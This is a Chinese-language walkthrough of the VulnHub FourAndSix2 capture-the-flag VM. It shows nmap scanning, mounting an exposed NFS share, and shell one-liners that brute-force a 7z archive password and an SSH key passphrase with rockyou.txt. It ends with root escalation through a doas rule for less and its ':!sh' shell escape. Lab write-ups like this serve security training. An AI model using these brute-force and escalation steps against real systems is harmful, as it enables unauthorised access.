主機來源:www.vulnhub.com
下載地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova
發現IP
安裝成功後,查找此虛擬機的IP,我使用的是netdiscover
netdiscover -i eth0 -r 10.0.3.1/24
是10.0.3.142(這裏紅框框錯了)
nmap
nmap -sV -p- 10.0.3.142
nfs
看到nfs服務是開啓的,確認下
rpcinfo -p 10.0.3.142
查看共享的目錄
showmount -e 10.0.3.142
掛載到本地
先創建一個文件夾
mkdir nfs
然後掛載
mount -t nfs 10.0.3.142:/hone/user/storage nfs
可以看到有一個壓縮文件
解壓
7z e backup.7z
暴破
需要密碼,暴破一下
寫入一個文件
cat $2 | while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$line;break;fi;done
修改權限
chmod 755 7z-crack.sh
執行
./7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt
解密後結果是chocolate
解壓壓縮包
看到了好東西
利用id_rsa登錄ssh
用戶名是user
ssh -i id_rsa [email protected]
得,這個也要密碼,繼續暴破
cat /usr/share/wordlists/rockyou.txt | while read line;do if ssh-keygen -p -P $line -N $line -f id_rsa 1>/dev/null 2>/dev/null;then echo "PASSWORD FOUND : "$line;break;fi;done;
一個很簡單的密碼
終於可以去登錄了
不容易呀不容易。。。首先感謝我的家人.......跑題了,繼續
提權
接下來就是提權了
找一下有特殊權限的文件
find / -perm -u=s -type f 2>/dev/null
這條命令的意思是,找一些權限爲-u=s的普通文件,(針對某個程序任何用戶都有讀寫這個程序的權限,可以像root用戶一樣操作,這個指令只對程序有效)
看到了doas,doas是OpenBSD 5.8上開始出現的,用來代替sudo
doas的配置文件位置:/etc/doas.conf
這句話的意思是,當前用戶能夠以root權限使用less命令查看/var/log/authlog文件,並且不需要當前用戶密碼以及root密碼。
我們就可以通過less來提權
查看日誌文件
doas /usr/bin/less /var/log/authlog
按v進入編輯模式,然後輸入:!sh
回車,查看權限
提權成功
讀取flag內容
